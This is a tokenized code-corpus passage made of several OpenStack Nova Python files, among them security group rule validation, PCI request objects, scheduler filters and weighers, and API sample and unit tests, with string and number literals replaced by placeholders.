protocol , from_port , to_port , cidr = grantee_cidr ) <EOL> @ staticmethod <EOL> def _new_ingress_rule ( ip_protocol , from_port , to_port , <EOL> group_id = None , cidr = None ) : <EOL> values = { } <EOL> if group_id : <EOL> values [ '<STR_LIT>' ] = group_id <EOL> ip_proto_upper = ip_protocol . upper ( ) if ip_protocol else '<STR_LIT>' <EOL> if ( ip_proto_upper == '<STR_LIT>' and <EOL> from_port is None and to_port is None ) : <EOL> from_port = - <NUM_LIT:1> <EOL> to_port = - <NUM_LIT:1> <EOL> elif ( ip_proto_upper in [ '<STR_LIT>' , '<STR_LIT>' ] and from_port is None <EOL> and to_port is None ) : <EOL> from_port = <NUM_LIT:1> <EOL> to_port = <NUM_LIT> <EOL> elif cidr : <EOL> values [ '<STR_LIT>' ] = cidr <EOL> if ip_protocol and from_port is not None and to_port is not None : <EOL> ip_protocol = str ( ip_protocol ) <EOL> try : <EOL> from_port = int ( from_port ) <EOL> to_port = int ( to_port ) <EOL> except ValueError : <EOL> if ip_protocol . 
upper ( ) == '<STR_LIT>' : <EOL> raise exception . InvalidInput ( reason = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> else : <EOL> raise exception . InvalidInput ( reason = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> if ip_protocol . upper ( ) not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise exception . InvalidIpProtocol ( protocol = ip_protocol ) <EOL> if ( ip_protocol . upper ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> ( from_port > to_port ) ) : <EOL> raise exception . InvalidPortRange ( from_port = from_port , <EOL> to_port = to_port , msg = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if ( ip_protocol . upper ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> ( from_port < <NUM_LIT:1> or to_port > <NUM_LIT> ) ) : <EOL> raise exception . InvalidPortRange ( from_port = from_port , <EOL> to_port = to_port , msg = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ip_protocol . upper ( ) ) <EOL> if ( ip_protocol . upper ( ) == "<STR_LIT>" and <EOL> ( from_port < - <NUM_LIT:1> or from_port > <NUM_LIT:255> or <EOL> to_port < - <NUM_LIT:1> or to_port > <NUM_LIT:255> ) ) : <EOL> raise exception . InvalidPortRange ( from_port = from_port , <EOL> to_port = to_port , msg = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> values [ '<STR_LIT>' ] = ip_protocol <EOL> values [ '<STR_LIT>' ] = from_port <EOL> values [ '<STR_LIT>' ] = to_port <EOL> else : <EOL> if cidr : <EOL> return None <EOL> return values <EOL> def create_security_group_rule ( self , context , security_group , new_rule ) : <EOL> if self . rule_exists ( security_group , new_rule ) : <EOL> msg = ( _ ( '<STR_LIT>' ) % <EOL> new_rule [ '<STR_LIT>' ] ) <EOL> self . raise_group_already_exists ( msg ) <EOL> return self . 
add_rules ( context , new_rule [ '<STR_LIT>' ] , <EOL> security_group [ '<STR_LIT:name>' ] , <EOL> [ new_rule ] ) [ <NUM_LIT:0> ] <EOL> def rule_exists ( self , security_group , new_rule ) : <EOL> """<STR_LIT>""" <EOL> for rule in security_group [ '<STR_LIT>' ] : <EOL> keys = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for key in keys : <EOL> if rule . get ( key ) != new_rule . get ( key ) : <EOL> break <EOL> else : <EOL> return rule . get ( '<STR_LIT:id>' ) or True <EOL> return False <EOL> def validate_property ( self , value , property , allowed ) : <EOL> pass <EOL> def ensure_default ( self , context ) : <EOL> pass <EOL> def trigger_rules_refresh ( self , context , id ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def trigger_members_refresh ( self , context , group_ids ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def populate_security_groups ( self , security_groups ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def create_security_group ( self , context , name , description ) : <EOL> raise NotImplementedError ( ) <EOL> def update_security_group ( self , context , security_group , <EOL> name , description ) : <EOL> raise NotImplementedError ( ) <EOL> def get ( self , context , name = None , id = None , map_exception = False ) : <EOL> raise NotImplementedError ( ) <EOL> def list ( self , context , names = None , ids = None , project = None , <EOL> search_opts = None ) : <EOL> raise NotImplementedError ( ) <EOL> def destroy ( self , context , security_group ) : <EOL> raise NotImplementedError ( ) <EOL> def add_rules ( self , context , id , name , vals ) : <EOL> raise NotImplementedError ( ) <EOL> def remove_rules ( self , context , security_group , rule_ids ) : <EOL> raise NotImplementedError ( ) <EOL> def get_rule ( self , context , id ) : <EOL> raise NotImplementedError ( ) <EOL> def get_instance_security_groups ( self , context , instance , detailed = False ) : <EOL> raise NotImplementedError ( ) <EOL> def 
add_to_instance ( self , context , instance , security_group_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def remove_from_instance ( self , context , instance , security_group_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ staticmethod <EOL> def raise_invalid_property ( msg ) : <EOL> raise exception . Invalid ( msg ) <EOL> @ staticmethod <EOL> def raise_group_already_exists ( msg ) : <EOL> raise exception . Invalid ( msg ) <EOL> @ staticmethod <EOL> def raise_invalid_group ( msg ) : <EOL> raise exception . Invalid ( msg ) <EOL> @ staticmethod <EOL> def raise_invalid_cidr ( cidr , decoding_exception = None ) : <EOL> raise exception . InvalidCidr ( cidr = cidr ) <EOL> @ staticmethod <EOL> def raise_over_quota ( msg ) : <EOL> raise exception . SecurityGroupLimitExceeded ( msg ) <EOL> @ staticmethod <EOL> def raise_not_found ( msg ) : <EOL> raise exception . SecurityGroupNotFound ( msg ) </s>
<s> from oslo_serialization import jsonutils <EOL> from oslo_utils import versionutils <EOL> from nova import db <EOL> from nova . objects import base <EOL> from nova . objects import fields <EOL> @ base . NovaObjectRegistry . register <EOL> class InstancePCIRequest ( base . NovaObject , <EOL> base . NovaObjectDictCompat ) : <EOL> VERSION = '<STR_LIT>' <EOL> fields = { <EOL> '<STR_LIT:count>' : fields . IntegerField ( ) , <EOL> '<STR_LIT>' : fields . ListOfDictOfNullableStringsField ( ) , <EOL> '<STR_LIT>' : fields . StringField ( nullable = True ) , <EOL> '<STR_LIT>' : fields . BooleanField ( default = False ) , <EOL> '<STR_LIT>' : fields . UUIDField ( nullable = True ) , <EOL> } <EOL> def obj_load_attr ( self , attr ) : <EOL> setattr ( self , attr , None ) <EOL> @ property <EOL> def new ( self ) : <EOL> return self . is_new <EOL> def obj_make_compatible ( self , primitive , target_version ) : <EOL> target_version = versionutils . convert_version_to_tuple ( target_version ) <EOL> if target_version < ( <NUM_LIT:1> , <NUM_LIT:1> ) and '<STR_LIT>' in primitive : <EOL> del primitive [ '<STR_LIT>' ] <EOL> @ base . NovaObjectRegistry . register <EOL> class InstancePCIRequests ( base . NovaObject , <EOL> base . NovaObjectDictCompat ) : <EOL> VERSION = '<STR_LIT>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . UUIDField ( ) , <EOL> '<STR_LIT>' : fields . ListOfObjectsField ( '<STR_LIT>' ) , <EOL> } <EOL> def obj_make_compatible ( self , primitive , target_version ) : <EOL> target_version = versionutils . convert_version_to_tuple ( target_version ) <EOL> if target_version < ( <NUM_LIT:1> , <NUM_LIT:1> ) and '<STR_LIT>' in primitive : <EOL> for index , request in enumerate ( self . requests ) : <EOL> request . 
obj_make_compatible ( <EOL> primitive [ '<STR_LIT>' ] [ index ] [ '<STR_LIT>' ] , '<STR_LIT:1.0>' ) <EOL> primitive [ '<STR_LIT>' ] [ index ] [ '<STR_LIT>' ] = '<STR_LIT:1.0>' <EOL> @ classmethod <EOL> def obj_from_db ( cls , context , instance_uuid , db_requests ) : <EOL> self = cls ( context = context , requests = [ ] , <EOL> instance_uuid = instance_uuid ) <EOL> if db_requests is not None : <EOL> requests = jsonutils . loads ( db_requests ) <EOL> else : <EOL> requests = [ ] <EOL> for request in requests : <EOL> request_obj = InstancePCIRequest ( <EOL> count = request [ '<STR_LIT:count>' ] , spec = request [ '<STR_LIT>' ] , <EOL> alias_name = request [ '<STR_LIT>' ] , is_new = request [ '<STR_LIT>' ] , <EOL> request_id = request [ '<STR_LIT>' ] ) <EOL> request_obj . obj_reset_changes ( ) <EOL> self . requests . append ( request_obj ) <EOL> self . obj_reset_changes ( ) <EOL> return self <EOL> @ base . remotable_classmethod <EOL> def get_by_instance_uuid ( cls , context , instance_uuid ) : <EOL> db_pci_requests = db . instance_extra_get_by_instance_uuid ( <EOL> context , instance_uuid , columns = [ '<STR_LIT>' ] ) <EOL> if db_pci_requests is not None : <EOL> db_pci_requests = db_pci_requests [ '<STR_LIT>' ] <EOL> return cls . obj_from_db ( context , instance_uuid , db_pci_requests ) <EOL> @ classmethod <EOL> def get_by_instance_uuid_and_newness ( cls , context , instance_uuid , is_new ) : <EOL> requests = cls . get_by_instance_uuid ( context , instance_uuid ) <EOL> requests . requests = [ x for x in requests . requests <EOL> if x . new == is_new ] <EOL> return requests <EOL> @ staticmethod <EOL> def _load_legacy_requests ( sysmeta_value , is_new = False ) : <EOL> if sysmeta_value is None : <EOL> return [ ] <EOL> requests = [ ] <EOL> db_requests = jsonutils . 
loads ( sysmeta_value ) <EOL> for db_request in db_requests : <EOL> request = InstancePCIRequest ( <EOL> count = db_request [ '<STR_LIT:count>' ] , spec = db_request [ '<STR_LIT>' ] , <EOL> alias_name = db_request [ '<STR_LIT>' ] , is_new = is_new ) <EOL> request . obj_reset_changes ( ) <EOL> requests . append ( request ) <EOL> return requests <EOL> @ classmethod <EOL> def get_by_instance ( cls , context , instance ) : <EOL> if '<STR_LIT>' in instance [ '<STR_LIT>' ] : <EOL> sysmeta = instance [ '<STR_LIT>' ] <EOL> _requests = ( <EOL> cls . _load_legacy_requests ( sysmeta [ '<STR_LIT>' ] ) + <EOL> cls . _load_legacy_requests ( sysmeta . get ( '<STR_LIT>' ) , <EOL> is_new = True ) ) <EOL> requests = cls ( instance_uuid = instance [ '<STR_LIT>' ] , requests = _requests ) <EOL> requests . obj_reset_changes ( ) <EOL> return requests <EOL> else : <EOL> return cls . get_by_instance_uuid ( context , instance [ '<STR_LIT>' ] ) <EOL> def to_json ( self ) : <EOL> blob = [ { '<STR_LIT:count>' : x . count , <EOL> '<STR_LIT>' : x . spec , <EOL> '<STR_LIT>' : x . alias_name , <EOL> '<STR_LIT>' : x . is_new , <EOL> '<STR_LIT>' : x . request_id } for x in self . requests ] <EOL> return jsonutils . dumps ( blob ) <EOL> @ classmethod <EOL> def from_request_spec_instance_props ( cls , pci_requests ) : <EOL> objs = [ InstancePCIRequest ( ** request ) <EOL> for request in pci_requests [ '<STR_LIT>' ] ] <EOL> return cls ( requests = objs , instance_uuid = pci_requests [ '<STR_LIT>' ] ) </s>
<s> import os <EOL> import sys <EOL> from oslo_config import cfg <EOL> path_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) ) , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = os . path . join ( sys . prefix , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( path_opts ) <EOL> def basedir_def ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT>' , * args ) <EOL> def bindir_def ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT>' , * args ) <EOL> def state_path_def ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT>' , * args ) <EOL> def basedir_rel ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( CONF . pybasedir , * args ) <EOL> def bindir_rel ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( CONF . bindir , * args ) <EOL> def state_path_rel ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( CONF . state_path , * args ) </s>
<s> from oslo_log import log as logging <EOL> from nova . i18n import _LW <EOL> from nova . scheduler import filters <EOL> from nova import servicegroup <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ComputeFilter ( filters . BaseHostFilter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . servicegroup_api = servicegroup . API ( ) <EOL> run_filter_once_per_request = True <EOL> def host_passes ( self , host_state , spec_obj ) : <EOL> """<STR_LIT>""" <EOL> service = host_state . service <EOL> if service [ '<STR_LIT>' ] : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : host_state , <EOL> '<STR_LIT>' : service . get ( '<STR_LIT>' ) } ) <EOL> return False <EOL> else : <EOL> if not self . servicegroup_api . service_is_up ( service ) : <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , { '<STR_LIT>' : host_state } ) <EOL> return False <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> import nova . conf <EOL> from nova . scheduler import weights <EOL> CONF = nova . conf . CONF <EOL> class IoOpsWeigher ( weights . BaseHostWeigher ) : <EOL> minval = <NUM_LIT:0> <EOL> def weight_multiplier ( self ) : <EOL> """<STR_LIT>""" <EOL> return CONF . io_ops_weight_multiplier <EOL> def _weigh_object ( self , host_state , weight_properties ) : <EOL> """<STR_LIT>""" <EOL> return host_state . num_io_ops </s>
<s> from six . moves import range <EOL> from nova . cells import state <EOL> import nova . conf <EOL> from nova . db . sqlalchemy import models <EOL> from nova import exception <EOL> from nova . tests . functional . api_sample_tests import api_sample_base <EOL> CONF = nova . conf . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class CellsSampleJsonTest ( api_sample_base . ApiSampleTestBaseV21 ) : <EOL> extension_name = "<STR_LIT>" <EOL> def _get_flags ( self ) : <EOL> f = super ( CellsSampleJsonTest , self ) . _get_flags ( ) <EOL> f [ '<STR_LIT>' ] = CONF . osapi_compute_extension [ : ] <EOL> f [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' ) <EOL> f [ '<STR_LIT>' ] . append ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return f <EOL> def setUp ( self ) : <EOL> self . flags ( enable = True , db_check_interval = - <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> super ( CellsSampleJsonTest , self ) . setUp ( ) <EOL> self . cells = self . start_service ( '<STR_LIT>' , manager = CONF . cells . manager ) <EOL> self . _stub_cells ( ) <EOL> def _stub_cells ( self , num_cells = <NUM_LIT:5> ) : <EOL> self . cell_list = [ ] <EOL> self . cells_next_id = <NUM_LIT:1> <EOL> def _fake_cell_get_all ( context ) : <EOL> return self . cell_list <EOL> def _fake_cell_get ( inst , context , cell_name ) : <EOL> for cell in self . cell_list : <EOL> if cell [ '<STR_LIT:name>' ] == cell_name : <EOL> return cell <EOL> raise exception . CellNotFound ( cell_name = cell_name ) <EOL> for x in range ( num_cells ) : <EOL> cell = models . Cell ( ) <EOL> our_id = self . cells_next_id <EOL> self . cells_next_id += <NUM_LIT:1> <EOL> cell . update ( { '<STR_LIT:id>' : our_id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' % our_id , <EOL> '<STR_LIT>' : '<STR_LIT>' % our_id , <EOL> '<STR_LIT>' : our_id % <NUM_LIT:2> == <NUM_LIT:0> } ) <EOL> self . cell_list . append ( cell ) <EOL> self . stub_out ( '<STR_LIT>' , _fake_cell_get_all ) <EOL> self . 
stub_out ( '<STR_LIT>' , _fake_cell_get ) <EOL> def test_cells_empty_list ( self ) : <EOL> self . _stub_cells ( num_cells = <NUM_LIT:0> ) <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> self . _verify_response ( '<STR_LIT>' , { } , response , <NUM_LIT:200> ) <EOL> def test_cells_list ( self ) : <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> self . _verify_response ( '<STR_LIT>' , { } , response , <NUM_LIT:200> ) <EOL> def test_cells_get ( self ) : <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> self . _verify_response ( '<STR_LIT>' , { } , response , <NUM_LIT:200> ) <EOL> def test_get_cell_capacity ( self ) : <EOL> self . _mock_cell_capacity ( ) <EOL> state_manager = state . CellStateManager ( ) <EOL> my_state = state_manager . get_my_state ( ) <EOL> response = self . _do_get ( '<STR_LIT>' % <EOL> my_state . name ) <EOL> return self . _verify_response ( '<STR_LIT>' , <EOL> { } , response , <NUM_LIT:200> ) <EOL> def test_get_all_cells_capacity ( self ) : <EOL> self . _mock_cell_capacity ( ) <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> return self . _verify_response ( '<STR_LIT>' , <EOL> { } , response , <NUM_LIT:200> ) <EOL> def _mock_cell_capacity ( self ) : <EOL> self . mox . StubOutWithMock ( self . cells . manager . state_manager , <EOL> '<STR_LIT>' ) <EOL> response = { "<STR_LIT>" : <EOL> { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:3> , "<STR_LIT>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : <NUM_LIT> } , <EOL> "<STR_LIT>" : <EOL> { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:11> , "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT:5> , "<STR_LIT:0>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : <NUM_LIT> } <EOL> } <EOL> self . cells . manager . state_manager . get_our_capacities ( ) . AndReturn ( response ) <EOL> self . mox . ReplayAll ( ) </s>
<s> from oslo_config import cfg <EOL> from nova . compute import vm_states <EOL> from nova . tests . functional . api_sample_tests import test_servers <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class ServersSampleHideAddressesJsonTest ( test_servers . ServersSampleJsonTest ) : <EOL> extension_name = '<STR_LIT>' <EOL> sample_dir = extension_name <EOL> def _get_flags ( self ) : <EOL> f = super ( ServersSampleHideAddressesJsonTest , self ) . _get_flags ( ) <EOL> f [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return f <EOL> def setUp ( self ) : <EOL> CONF . set_override ( "<STR_LIT>" , <EOL> [ vm_states . ACTIVE ] ) <EOL> super ( ServersSampleHideAddressesJsonTest , self ) . setUp ( ) </s>
<s> from oslo_config import cfg <EOL> from nova . tests . functional . api_sample_tests import api_sample_base <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class ServerGroupsSampleJsonTest ( api_sample_base . ApiSampleTestBaseV21 ) : <EOL> extension_name = "<STR_LIT>" <EOL> def _get_flags ( self ) : <EOL> f = super ( ServerGroupsSampleJsonTest , self ) . _get_flags ( ) <EOL> f [ '<STR_LIT>' ] = CONF . osapi_compute_extension [ : ] <EOL> f [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' ) <EOL> return f <EOL> def _get_create_subs ( self ) : <EOL> return { '<STR_LIT:name>' : '<STR_LIT:test>' } <EOL> def _post_server_group ( self ) : <EOL> """<STR_LIT>""" <EOL> subs = self . _get_create_subs ( ) <EOL> response = self . _do_post ( '<STR_LIT>' , <EOL> '<STR_LIT>' , subs ) <EOL> subs = { } <EOL> subs [ '<STR_LIT:name>' ] = '<STR_LIT:test>' <EOL> return self . _verify_response ( '<STR_LIT>' , <EOL> subs , response , <NUM_LIT:200> ) <EOL> def _create_server_group ( self ) : <EOL> subs = self . _get_create_subs ( ) <EOL> return self . _do_post ( '<STR_LIT>' , <EOL> '<STR_LIT>' , subs ) <EOL> def test_server_groups_post ( self ) : <EOL> return self . _post_server_group ( ) <EOL> def test_server_groups_list ( self ) : <EOL> subs = self . _get_create_subs ( ) <EOL> uuid = self . _post_server_group ( ) <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> subs [ '<STR_LIT:id>' ] = uuid <EOL> self . _verify_response ( '<STR_LIT>' , <EOL> subs , response , <NUM_LIT:200> ) <EOL> def test_server_groups_get ( self ) : <EOL> subs = { '<STR_LIT:name>' : '<STR_LIT:test>' } <EOL> uuid = self . _post_server_group ( ) <EOL> subs [ '<STR_LIT:id>' ] = uuid <EOL> response = self . _do_get ( '<STR_LIT>' % uuid ) <EOL> self . _verify_response ( '<STR_LIT>' , subs , response , <NUM_LIT:200> ) <EOL> def test_server_groups_delete ( self ) : <EOL> uuid = self . _post_server_group ( ) <EOL> response = self . _do_delete ( '<STR_LIT>' % uuid ) <EOL> self . 
assertEqual ( <NUM_LIT> , response . status_code ) <EOL> class ServerGroupsV213SampleJsonTest ( ServerGroupsSampleJsonTest ) : <EOL> scenarios = [ <EOL> ( "<STR_LIT>" , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ] <EOL> def setUp ( self ) : <EOL> super ( ServerGroupsV213SampleJsonTest , self ) . setUp ( ) <EOL> self . api . microversion = self . microversion </s>
<s> from nova import context <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova . objects import fields <EOL> from nova import test <EOL> from nova . tests import fixtures <EOL> from nova . tests import uuidsentinel <EOL> DISK_INVENTORY = dict ( <EOL> total = <NUM_LIT:200> , <EOL> reserved = <NUM_LIT:10> , <EOL> min_unit = <NUM_LIT:2> , <EOL> max_unit = <NUM_LIT:5> , <EOL> step_size = <NUM_LIT:1> , <EOL> allocation_ratio = <NUM_LIT:1.0> <EOL> ) <EOL> class ResourceProviderTestCase ( test . NoDBTestCase ) : <EOL> """<STR_LIT>""" <EOL> USES_DB_SELF = True <EOL> def setUp ( self ) : <EOL> super ( ResourceProviderTestCase , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . Database ( ) ) <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_create_resource_provider_requires_uuid ( self ) : <EOL> resource_provider = objects . ResourceProvider ( <EOL> context = self . context ) <EOL> self . assertRaises ( exception . ObjectActionError , <EOL> resource_provider . create ) <EOL> def test_create_resource_provider ( self ) : <EOL> created_resource_provider = objects . ResourceProvider ( <EOL> context = self . context , <EOL> uuid = uuidsentinel . fake_resource_provider <EOL> ) <EOL> created_resource_provider . create ( ) <EOL> self . assertIsInstance ( created_resource_provider . id , int ) <EOL> retrieved_resource_provider = objects . ResourceProvider . get_by_uuid ( <EOL> self . context , <EOL> uuidsentinel . fake_resource_provider <EOL> ) <EOL> self . assertEqual ( retrieved_resource_provider . id , <EOL> created_resource_provider . id ) <EOL> def test_create_inventory_with_uncreated_provider ( self ) : <EOL> resource_provider = objects . ResourceProvider ( <EOL> context = self . context , <EOL> uuid = uuidsentinel . inventory_resource_provider <EOL> ) <EOL> resource_class = fields . ResourceClass . DISK_GB <EOL> disk_inventory = objects . Inventory ( <EOL> context = self . 
context , <EOL> resource_provider = resource_provider , <EOL> resource_class = resource_class , <EOL> ** DISK_INVENTORY <EOL> ) <EOL> self . assertRaises ( exception . ObjectActionError , <EOL> disk_inventory . create ) <EOL> def test_create_and_update_inventory ( self ) : <EOL> resource_provider = objects . ResourceProvider ( <EOL> context = self . context , <EOL> uuid = uuidsentinel . inventory_resource_provider <EOL> ) <EOL> resource_provider . create ( ) <EOL> resource_class = fields . ResourceClass . DISK_GB <EOL> disk_inventory = objects . Inventory ( <EOL> context = self . context , <EOL> resource_provider = resource_provider , <EOL> resource_class = resource_class , <EOL> ** DISK_INVENTORY <EOL> ) <EOL> disk_inventory . create ( ) <EOL> self . assertEqual ( resource_class , disk_inventory . resource_class ) <EOL> self . assertEqual ( resource_provider , <EOL> disk_inventory . resource_provider ) <EOL> self . assertEqual ( DISK_INVENTORY [ '<STR_LIT>' ] , <EOL> disk_inventory . allocation_ratio ) <EOL> self . assertEqual ( DISK_INVENTORY [ '<STR_LIT>' ] , <EOL> disk_inventory . total ) <EOL> disk_inventory . total = <NUM_LIT:32> <EOL> disk_inventory . save ( ) <EOL> inventories = objects . InventoryList . get_all_by_resource_provider_uuid ( <EOL> self . context , resource_provider . uuid ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( inventories ) ) <EOL> self . assertEqual ( <NUM_LIT:32> , inventories [ <NUM_LIT:0> ] . total ) <EOL> inventories [ <NUM_LIT:0> ] . total = <NUM_LIT> <EOL> inventories [ <NUM_LIT:0> ] . save ( ) <EOL> reloaded_inventories = ( <EOL> objects . InventoryList . get_all_by_resource_provider_uuid ( <EOL> self . context , resource_provider . uuid ) ) <EOL> self . assertEqual ( <NUM_LIT> , reloaded_inventories [ <NUM_LIT:0> ] . total ) </s>
<s> import copy <EOL> import mock <EOL> from nova . api . openstack . compute import hypervisors as hypervisors_v21 <EOL> from nova . api . openstack . compute . legacy_v2 . contrib import hypervisors as hypervisors_v2 <EOL> from nova . api . openstack import extensions <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack . compute import test_hypervisors <EOL> from nova . tests . unit . api . openstack import fakes <EOL> def fake_compute_node_get ( context , compute_id ) : <EOL> for hyper in test_hypervisors . TEST_HYPERS_OBJ : <EOL> if hyper . id == int ( compute_id ) : <EOL> return hyper <EOL> raise exception . ComputeHostNotFound ( host = compute_id ) <EOL> def fake_compute_node_get_all ( context ) : <EOL> return test_hypervisors . TEST_HYPERS_OBJ <EOL> @ classmethod <EOL> def fake_service_get_by_compute_host ( cls , context , host ) : <EOL> for service in test_hypervisors . TEST_SERVICES : <EOL> if service . host == host : <EOL> return service <EOL> class ExtendedHypervisorsTestV21 ( test . NoDBTestCase ) : <EOL> DETAIL_HYPERS_DICTS = copy . deepcopy ( test_hypervisors . TEST_HYPERS ) <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT:host>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT:host>' ] <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] . update ( { '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dict ( id = <NUM_LIT:1> , host = '<STR_LIT>' , <EOL> disabled_reason = None ) } ) <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] . update ( { '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dict ( id = <NUM_LIT:2> , host = '<STR_LIT>' , <EOL> disabled_reason = None ) } ) <EOL> def _set_up_controller ( self ) : <EOL> self . 
controller = hypervisors_v21 . HypervisorsController ( ) <EOL> self . controller . servicegroup_api . service_is_up = mock . MagicMock ( <EOL> return_value = True ) <EOL> def _get_request ( self ) : <EOL> return fakes . HTTPRequest . blank ( '<STR_LIT>' , <EOL> use_admin_context = True ) <EOL> def setUp ( self ) : <EOL> super ( ExtendedHypervisorsTestV21 , self ) . setUp ( ) <EOL> self . _set_up_controller ( ) <EOL> self . stubs . Set ( self . controller . host_api , '<STR_LIT>' , <EOL> fake_compute_node_get_all ) <EOL> self . stubs . Set ( self . controller . host_api , '<STR_LIT>' , <EOL> fake_compute_node_get ) <EOL> self . stubs . Set ( objects . Service , '<STR_LIT>' , <EOL> fake_service_get_by_compute_host ) <EOL> def test_view_hypervisor_detail_noservers ( self ) : <EOL> result = self . controller . _view_hypervisor ( <EOL> test_hypervisors . TEST_HYPERS_OBJ [ <NUM_LIT:0> ] , <EOL> test_hypervisors . TEST_SERVICES [ <NUM_LIT:0> ] , True ) <EOL> self . assertEqual ( result , self . DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] ) <EOL> def test_detail ( self ) : <EOL> req = self . _get_request ( ) <EOL> result = self . controller . detail ( req ) <EOL> self . assertEqual ( result , dict ( hypervisors = self . DETAIL_HYPERS_DICTS ) ) <EOL> def test_show_withid ( self ) : <EOL> req = self . _get_request ( ) <EOL> result = self . controller . show ( req , '<STR_LIT:1>' ) <EOL> self . assertEqual ( result , dict ( hypervisor = self . DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] ) ) <EOL> class ExtendedHypervisorsTestV2 ( ExtendedHypervisorsTestV21 ) : <EOL> DETAIL_HYPERS_DICTS = copy . deepcopy ( test_hypervisors . TEST_HYPERS ) <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT:host>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT:host>' ] <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] . 
